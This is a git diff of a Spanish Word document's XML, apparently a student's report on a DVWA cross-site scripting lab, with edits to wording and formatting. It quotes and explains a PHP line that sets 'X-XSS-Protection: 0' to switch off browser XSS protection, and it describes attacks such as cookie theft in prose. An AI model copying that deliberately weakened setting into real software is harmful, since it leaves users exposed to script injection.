--- a/SRPING_8_CLIENTE_SIDE _XSS_CROSS_SITE_SCRIPTING/CHALLENGES/chalenge_1_Unit_1_Spring_8.docx
+++ b/SRPING_8_CLIENTE_SIDE _XSS_CROSS_SITE_SCRIPTING/CHALLENGES/chalenge_1_Unit_1_Spring_8.docx
@@ -17,10 +17,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C9480AD" wp14:editId="60458F8D">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FA9884" wp14:editId="245FF9C2">
             <wp:extent cx="5400040" cy="5400040"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1034893075" name="Imagen 1" descr="un estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un informe"/>
+            <wp:docPr id="1985881956" name="Imagen 2" descr="Representación artística seria y profesional de un ataque basado en DOM XSS, con elementos de código fuente y en tonos oscuros"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -28,7 +28,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="un estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un informe"/>
+                    <pic:cNvPr id="0" name="Picture 4" descr="Representación artística seria y profesional de un ataque basado en DOM XSS, con elementos de código fuente y en tonos oscuros"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -199,17 +199,6 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -463,18 +452,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>s un tipo de ataque web en el que un atacante inyecta código malicioso en una solicitud HTTP que se envía a un servidor web vulnerable</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, el cual no tiene mecanismos de validación de ese “input”, procesando el código malicioso, que reflejara posteriormente en el navegador del usuario como parte del código HTML de la web, permitiendo al atacante realizar acciones no deseadas por el usuario.</w:t>
+        <w:t>s un tipo de ataque web en el que un atacante inyecta código malicioso en una solicitud HTTP que se envía a un servidor web vulnerable, el cual no tiene mecanismos de validación de ese “input”, procesando el código malicioso, que reflejara posteriormente en el navegador del usuario como parte del código HTML de la web, permitiendo al atacante realizar acciones no deseadas por el usuario.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -615,51 +593,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>, engañado por</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> el atacante </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">que usa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>métodos de ingeniería social</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, se gana la </w:t>
+        <w:t xml:space="preserve">, engañado por el atacante que usa métodos de ingeniería social, se gana la </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -838,20 +772,30 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>En este punto, la inyección se ha llevado a cabo y el actor malicioso puede ejecutar acciones no deseadas por el usuario ( robo de cookies de inicio de sesión, modificación de contenido de la web, redirigir el usuario a otro sitio web fraudulento e incluso tomar el control del navegador del usuario.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">En este punto, la inyección se ha llevado a cabo y el actor malicioso puede ejecutar acciones no deseadas por el usuario </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(robo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de cookies de inicio de sesión, modificación de contenido de la web, redirigir el usuario a otro sitio web fraudulento e incluso tomar el control del navegador del usuario.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -922,6 +866,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -1002,15 +947,17 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1036,35 +983,99 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>(&lt;?</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>php)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y cierre (?&gt;)</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> y cierre (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1085,46 +1096,51 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t>header ("X-XSS-Protection: 0");</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="0000BB"/>
-        </w:rPr>
-        <w:t>header </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="DD0000"/>
-        </w:rPr>
-        <w:t>"X-XSS-Protection: 0"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-        </w:rPr>
-        <w:t xml:space="preserve">); </w:t>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1190,7 +1206,271 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> encabezado HTTP llamado “X-XSS-Protection”, siendo una medida de seguridad usada para indicar al navegador el nivel de protección frente ataques XSS, que, en este caso concreto, al asignarle valor cero, le esta indicando que no active ninguna medida de protección. En un entorno de pruebas como la maquina DVWA puede ser útil, pero en entornos de producción, es recomendable no desactivar esta función (valor 1).</w:t>
+        <w:t xml:space="preserve"> encabezado HTTP llamado “X-XSS-Protection”, siendo una medida de seguridad usada para indicar al navegador el nivel de protección frente ataques XSS, que, en este caso concreto, al asignarle valor cero, le esta indicando que no active ninguna medida de protección. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>En la actualidad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>esta cabecera</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ha quedado obsoleta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> salvo para navegadores antiguos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:footnoteReference w:id="1"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">debido a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>las mejoras en los mecanismos internos de los navegadores modernos frente a ataques de XSS junto a las políticas de seguridad de contenido actuales (CSP)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:footnoteReference w:id="2"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que ofrecen mecanismos mas robustos contra ataques de inyección de código</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD0FF0C" wp14:editId="516E2ACF">
+            <wp:extent cx="4971415" cy="552450"/>
+            <wp:effectExtent l="0" t="0" r="635" b="0"/>
+            <wp:docPr id="25439847" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="25439847" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4971415" cy="552450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F529BC" wp14:editId="52AFC595">
+            <wp:extent cx="5133975" cy="2639060"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
+            <wp:docPr id="2004585336" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2004585336" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5133975" cy="2639060"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -1200,155 +1480,133 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
